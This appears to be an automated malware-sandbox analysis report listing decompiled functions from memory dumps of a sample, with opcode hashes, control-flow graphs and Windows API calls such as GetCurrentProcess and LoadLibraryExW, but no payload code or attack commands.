                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8317faab50ac7c66a26191dae70fa7813a513e9a1bcdd42a8d2a072177619137
                                                                                                                                                                                                                                                  • Instruction ID: 78ed70323b3e0ae9a1310ec065fc3aa5d75fa5babfc667ec4d7ae8734b514e2e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8317faab50ac7c66a26191dae70fa7813a513e9a1bcdd42a8d2a072177619137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F03030618E0C8FCAE4FF29D184B6573E4FB19300F50494DF89EC3646D631E8918B42
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000001A0BB550498 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7f40abab4a395220209bb204973762990f79d5169fd941662469a31ced271609
                                                                                                                                                                                                                                                  • Instruction ID: 33ac52870501a77609cc6296959a38845bf693649cb0d6a64e3bb9f147bd8e9f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f40abab4a395220209bb204973762990f79d5169fd941662469a31ced271609
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E01D7164CB086FD1188559BC467B273E4E74D735F20451EF59E8358299127801465E
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000001A0BB56E7C0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14b40c784dce6d689c495226e21d619e7de06de0ce478d24940a191bdb754341
                                                                                                                                                                                                                                                  • Instruction ID: eb5dc43acb2972d5923e49742a6ba3d802f4e5582009c2b62c92320f282a3fec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b40c784dce6d689c495226e21d619e7de06de0ce478d24940a191bdb754341
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87E01234926F884BD668FF7459463AAB3D4F70A700F800959E89B83543D570A4A186A3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000001A0BB56A274 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f3b51583ab959a0629488c3ac10a70ebcf6a9633a7c434bba773dc378663a834
                                                                                                                                                                                                                                                  • Instruction ID: 0b1ebed766cbe6142af7ca07ce24d40177c9a9d8e48d35b41b566d3047df3cb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3b51583ab959a0629488c3ac10a70ebcf6a9633a7c434bba773dc378663a834
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6D05B34965F084BC5B1FF7459863A973D4FB0E700F800569E89B82547DA31E450C6A3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 000001A0BB563918 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2886429868.000001A0BB54C000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001A0BB54C000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1a0bb54c000_embedded.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4d985430cd642aafd0e1857dc8a02a792aebe8b2a401ec30d1c939ee80d7184e
                                                                                                                                                                                                                                                  • Instruction ID: 800a88831f69d183b72f2cc1abf3b2c126ec7b3df7010754ea813fbc05d10aac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d985430cd642aafd0e1857dc8a02a792aebe8b2a401ec30d1c939ee80d7184e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DC01234E15D584BE1B5EAA861053E97394E70B700F800549D89F81983D911A850CDA3
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:6.6%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:52
                                                                                                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                                                                                                  execution_graph 24157 2a2d300 DuplicateHandle 24158 2a2d396 24157->24158 24159 2a2d0b8 24160 2a2d0fe GetCurrentProcess 24159->24160 24162 2a2d150 GetCurrentThread 24160->24162 24163 2a2d149 24160->24163 24164 2a2d186 24162->24164 24165 2a2d18d GetCurrentProcess 24162->24165 24163->24162 24164->24165 24168 2a2d1c3 24165->24168 24166 2a2d1eb GetCurrentThreadId 24167 2a2d21c 24166->24167 24168->24166 24169 2a2ad38 24170 2a2ad47 24169->24170 24173 2a2ae20 24169->24173 24181 2a2ae30 24169->24181 24174 2a2ae41 24173->24174 24175 2a2ae64 24173->24175 24174->24175 24189 2a2b0b8 24174->24189 24193 2a2b0c8 24174->24193 24175->24170 24176 2a2ae5c 24176->24175 24177 2a2b068 GetModuleHandleW 24176->24177 24178 2a2b095 24177->24178 24178->24170 24182 2a2ae41 24181->24182 24183 2a2ae64 24181->24183 24182->24183 24187 2a2b0b8 LoadLibraryExW 24182->24187 24188 2a2b0c8 LoadLibraryExW 24182->24188 24183->24170 24184 2a2ae5c 24184->24183 24185 2a2b068 GetModuleHandleW 24184->24185 24186 2a2b095 24185->24186 24186->24170 24187->24184 24188->24184 24190 2a2b0dc 24189->24190 24192 2a2b101 24190->24192 24197 2a2a870 24190->24197 24192->24176 24194 2a2b0dc 24193->24194 24195 2a2b101 24194->24195 24196 2a2a870 LoadLibraryExW 24194->24196 24195->24176 24196->24195 24198 2a2b2a8 LoadLibraryExW 24197->24198 24200 2a2b321 24198->24200 24200->24192 24201 2a24668 24202 2a24684 24201->24202 24203 2a24696 24202->24203 24205 2a247a0 24202->24205 24206 2a247c5 24205->24206 24210 2a248b0 24206->24210 24214 2a248a1 24206->24214 24212 2a248d7 24210->24212 24211 2a249b4 24211->24211 24212->24211 24218 2a24248 24212->24218 24216 2a248d7 24214->24216 24215 2a249b4 24215->24215 24216->24215 24217 2a24248 CreateActCtxA 24216->24217 24217->24215 24219 2a25940 CreateActCtxA 24218->24219 24221 2a25a03 24219->24221

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 065B9FB0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 560 65b9fb0-65b9fdb 561 65b9fdd 560->561 562 65b9fe2-65ba034 560->562 561->562 564 65ba058-65ba05a 562->564 565 65ba036-65ba056 562->565 566 65ba05d-65ba068 564->566 565->566 568 65ba06e-65ba18b 566->568 569 65ba237-65ba25b 566->569 599 65ba18d call 65ba330 568->599 600 65ba18d call 65ba320 568->600 574 65ba25c-65ba28a 569->574 588 65ba193-65ba1a5 601 65ba1aa call 65bb328 588->601 602 65ba1aa call 65bb317 588->602 589 65ba1b0-65ba21b call 65b6920 * 2 597 65ba21e call 65bbc38 589->597 598 65ba21e call 65bbbe8 589->598 596 65ba224-65ba235 596->574 597->596 598->596 599->588 600->588 601->589 602->589
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 1$v
                                                                                                                                                                                                                                                  • API String ID: 0-2456183578
                                                                                                                                                                                                                                                  • Opcode ID: 3a3f183fb168f1e1539fdb3b9aecdcc91def3d7fd50158e48df9e47f03f4faa2
                                                                                                                                                                                                                                                  • Instruction ID: f19b8a8ef3d53cacfbd01137d30a7f08b975188c9baeb0a60bb04f6d4784f3c8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a3f183fb168f1e1539fdb3b9aecdcc91def3d7fd50158e48df9e47f03f4faa2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C91A074E01218CFDB58DFA9D990A9DBBB2FF89300F1490AAD819AB355DB315982CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065B9FA1 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 603 65b9fa1-65b9fdb 605 65b9fdd 603->605 606 65b9fe2-65ba034 603->606 605->606 608 65ba058-65ba05a 606->608 609 65ba036-65ba056 606->609 610 65ba05d-65ba068 608->610 609->610 612 65ba06e-65ba171 610->612 613 65ba237-65ba25b 610->613 631 65ba177-65ba18b 612->631 618 65ba25c-65ba28a 613->618 643 65ba18d call 65ba330 631->643 644 65ba18d call 65ba320 631->644 632 65ba193-65ba1a5 645 65ba1aa call 65bb328 632->645 646 65ba1aa call 65bb317 632->646 633 65ba1b0-65ba201 call 65b6920 * 2 639 65ba206-65ba21b 633->639 641 65ba21e call 65bbc38 639->641 642 65ba21e call 65bbbe8 639->642 640 65ba224-65ba235 640->618 641->640 642->640 643->632 644->632 645->633 646->633
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 1$v
                                                                                                                                                                                                                                                  • API String ID: 0-2456183578
                                                                                                                                                                                                                                                  • Opcode ID: 66a756981a334f7e4085457cdbd5c20d05973f8dfb1ca3c385b23781971f83d2
                                                                                                                                                                                                                                                  • Instruction ID: 467c38d2a6daef9c419cc206ebeb98087ac3d7ebda5d60188db644a3e7cc83a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66a756981a334f7e4085457cdbd5c20d05973f8dfb1ca3c385b23781971f83d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A891C274E01218CFDB58DFA9D984B9DBBB2FF89300F1490AAD809AB355DB315982CF10
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BFBE0 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 760965f0cd4f19bd09361b439dd8e1640a1a1d56166856b9e786da24a14de18d
                                                                                                                                                                                                                                                  • Instruction ID: 8c35a2fbd7812e06ccdc53d75e6124ded6dbc99125cea00e3b04415d8ada1749
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 760965f0cd4f19bd09361b439dd8e1640a1a1d56166856b9e786da24a14de18d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07C19278E012089FDB44DFA9D984ADEBBF2FF88300F249469E815A7355DB34AA41CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BFBD1 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 24e36b0b9cc66e1b1cf84e8974dbf421836f3c956290aff342e560aa1b16433e
                                                                                                                                                                                                                                                  • Instruction ID: bc73168d9cb9dab67b6d2acc774cd277d46b0483cba4b380cb2d69a180980296
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24e36b0b9cc66e1b1cf84e8974dbf421836f3c956290aff342e560aa1b16433e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFA1A478E012089FDB44DFA9D984AEEBBF2FF89300F249469E414AB355D734AA45CF50
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2D0A8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 294 2a2d0a8-2a2d147 GetCurrentProcess 298 2a2d150-2a2d184 GetCurrentThread 294->298 299 2a2d149-2a2d14f 294->299 300 2a2d186-2a2d18c 298->300 301 2a2d18d-2a2d1c1 GetCurrentProcess 298->301 299->298 300->301 303 2a2d1c3-2a2d1c9 301->303 304 2a2d1ca-2a2d1e5 call 2a2d289 301->304 303->304 306 2a2d1eb-2a2d21a GetCurrentThreadId 304->306 308 2a2d223-2a2d285 306->308 309 2a2d21c-2a2d222 306->309 309->308
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D136
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 02A2D173
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D1B0
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A2D209
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                  • Opcode ID: f47e7531dab72a1e43835828cea2f6459fe09011147970df5fbfae74bfaba6c5
                                                                                                                                                                                                                                                  • Instruction ID: c04796d2d749a5a089213ce9387ddcb0a94bcc2e6caee1c430a421d1613b756a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f47e7531dab72a1e43835828cea2f6459fe09011147970df5fbfae74bfaba6c5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D05158B09007598FDB14DFA9D6487DEBBF1EF48304F20849AD059A73A1DB749888CF65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 316 2a2d0b8-2a2d147 GetCurrentProcess 320 2a2d150-2a2d184 GetCurrentThread 316->320 321 2a2d149-2a2d14f 316->321 322 2a2d186-2a2d18c 320->322 323 2a2d18d-2a2d1c1 GetCurrentProcess 320->323 321->320 322->323 325 2a2d1c3-2a2d1c9 323->325 326 2a2d1ca-2a2d1e5 call 2a2d289 323->326 325->326 328 2a2d1eb-2a2d21a GetCurrentThreadId 326->328 330 2a2d223-2a2d285 328->330 331 2a2d21c-2a2d222 328->331 331->330
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D136
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 02A2D173
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 02A2D1B0
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A2D209
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1803348246.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_2a20000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                  • Opcode ID: 3c19d12f555f5e8e66726a2efc9ac707761d8501024b9381d2b447e87f0bb04f
                                                                                                                                                                                                                                                  • Instruction ID: f3639ac6d2445472671d6f88330c517c1d70cd22f48648d66f669373965e67ae
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c19d12f555f5e8e66726a2efc9ac707761d8501024b9381d2b447e87f0bb04f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 035158B0D006598FDB14DFA9D548BDEBBF1EF48314F208459D019A7360DB749988CF65
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BC480 Relevance: 5.5, Strings: 4, Instructions: 465COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 338 65bc480-65bc4ab 339 65bc4ad 338->339 340 65bc4b2-65bc523 338->340 339->340 342 65bc529-65bc52e 340->342 343 65bc6cc-65bc6e9 340->343 344 65bc54f 342->344 345 65bc530-65bc539 342->345 351 65bc6eb-65bc722 343->351 352 65bc72d-65bc731 343->352 346 65bc552-65bc5c9 344->346 347 65bc53b-65bc53e 345->347 348 65bc540-65bc543 345->348 372 65bc5cb-65bc5d2 346->372 373 65bc5ed 346->373 350 65bc54d 347->350 348->350 350->346 351->352 354 65bc733-65bc73c 352->354 355 65bc752 352->355 356 65bc73e-65bc741 354->356 357 65bc743-65bc746 354->357 358 65bc755-65bc7a4 355->358 360 65bc750 356->360 357->360 369 65bc7a6-65bc7af 358->369 370 65bc7c5 358->370 360->358 375 65bc7b1-65bc7b4 369->375 376 65bc7b6-65bc7b9 369->376 374 65bc7c8-65bc7d3 370->374 372->373 377 65bc5d4-65bc5eb 372->377 378 65bc5f4-65bc5ff 373->378 383 65bc7d4-65bc7da 374->383 379 65bc7c3 375->379 376->379 377->378 380 65bc686-65bc6c7 378->380 381 65bc605-65bc67b 378->381 379->374 380->383 381->380 386 65bc7eb 383->386 387 65bc7dc-65bc7e9 383->387 388 65bc7f2-65bc823 386->388 387->388 395 65bc83b 388->395 396 65bc825-65bc839 388->396 397 65bc842-65bc84d 395->397 396->397 399 65bc84f-65bc886 397->399 400 65bc891-65bc8a5 397->400 399->400 401 65bc8d8-65bc8f0 400->401 402 65bc8a7-65bc8d7 400->402 435 65bc8f5 call 65bcc18 401->435 436 65bc8f5 call 65bcc28 401->436 402->401 405 65bc8fb-65bc94a 433 65bc950 call 65bd458 405->433 434 65bc950 call 65bd460 405->434 411 65bc956-65bc966 call 65bea55 412 65bc96c-65bc9aa 411->412 415 65bc9ac-65bca14 412->415 416 65bca26-65bcaaf 412->416 423 65bca1b-65bca21 415->423 424 65bca16 415->424 425 65bcab0-65bcb29 416->425 423->425 424->423 433->411 434->411 435->405 436->405
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$`
                                                                                                                                                                                                                                                  • API String ID: 0-4250499658
                                                                                                                                                                                                                                                  • Opcode ID: 24b741278405e1de0559a9b8549219e839691c3d313a4f081c01156c1f24df85
                                                                                                                                                                                                                                                  • Instruction ID: 8bfbac697c2619e2542d78083f816e7a1ef2624a5dd3e59d7a49187c46fe8d93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24b741278405e1de0559a9b8549219e839691c3d313a4f081c01156c1f24df85
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1122A174A002198FDB54CFA8C984B9DBBF2FF49300F1095A9D409AB365D774AE86CF94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065BC46F Relevance: 4.1, Strings: 3, Instructions: 351COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 438 65bc46f-65bc4ab 439 65bc4ad 438->439 440 65bc4b2-65bc523 438->440 439->440 442 65bc529-65bc52e 440->442 443 65bc6cc-65bc6e9 440->443 444 65bc54f 442->444 445 65bc530-65bc539 442->445 451 65bc6eb-65bc722 443->451 452 65bc72d-65bc731 443->452 446 65bc552-65bc5c9 444->446 447 65bc53b-65bc53e 445->447 448 65bc540-65bc543 445->448 472 65bc5cb-65bc5d2 446->472 473 65bc5ed 446->473 450 65bc54d 447->450 448->450 450->446 451->452 454 65bc733-65bc73c 452->454 455 65bc752 452->455 456 65bc73e-65bc741 454->456 457 65bc743-65bc746 454->457 458 65bc755-65bc7a4 455->458 460 65bc750 456->460 457->460 469 65bc7a6-65bc7af 458->469 470 65bc7c5 458->470 460->458 475 65bc7b1-65bc7b4 469->475 476 65bc7b6-65bc7b9 469->476 474 65bc7c8-65bc7d3 470->474 472->473 477 65bc5d4-65bc5eb 472->477 478 65bc5f4-65bc5ff 473->478 483 65bc7d4-65bc7da 474->483 479 65bc7c3 475->479 476->479 477->478 480 65bc686-65bc6c7 478->480 481 65bc605-65bc67b 478->481 479->474 480->483 481->480 486 65bc7eb 483->486 487 65bc7dc-65bc7e9 483->487 488 65bc7f2-65bc823 486->488 487->488 495 65bc83b 488->495 496 65bc825-65bc839 488->496 497 65bc842-65bc84d 495->497 496->497 499 65bc84f-65bc886 497->499 500 65bc891-65bc8a5 497->500 499->500 501 65bc8d8-65bc8f0 500->501 502 65bc8a7-65bc8d7 500->502 535 65bc8f5 call 65bcc18 501->535 536 65bc8f5 call 65bcc28 501->536 502->501 505 65bc8fb-65bc94a 533 65bc950 call 65bd458 505->533 534 65bc950 call 65bd460 505->534 511 65bc956-65bc966 call 65bea55 512 65bc96c-65bc9aa 511->512 515 65bc9ac-65bca14 512->515 516 65bca26-65bcaaf 512->516 523 65bca1b-65bca21 515->523 524 65bca16 515->524 525 65bcab0-65bcb29 516->525 523->525 524->523 533->511 534->511 535->505 536->505
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.1829078971.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_65b0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: Hbq$Hbq$`
                                                                                                                                                                                                                                                  • API String ID: 0-1535830117
                                                                                                                                                                                                                                                  • Opcode ID: 9b2cd3c51625f2cd212ade7384a242fe1f06d519c0db45cafb56c00845098a4d
                                                                                                                                                                                                                                                  • Instruction ID: 700bc811ec8061518afe278724e5c5121044505239b1fc1897d45152dcffc1cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b2cd3c51625f2cd212ade7384a242fe1f06d519c0db45cafb56c00845098a4d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF1A074E012198FDB54CFA9C984B9DBBF2BF48300F1095A9D449AB365D730AE86CF94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 02A2AE30 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
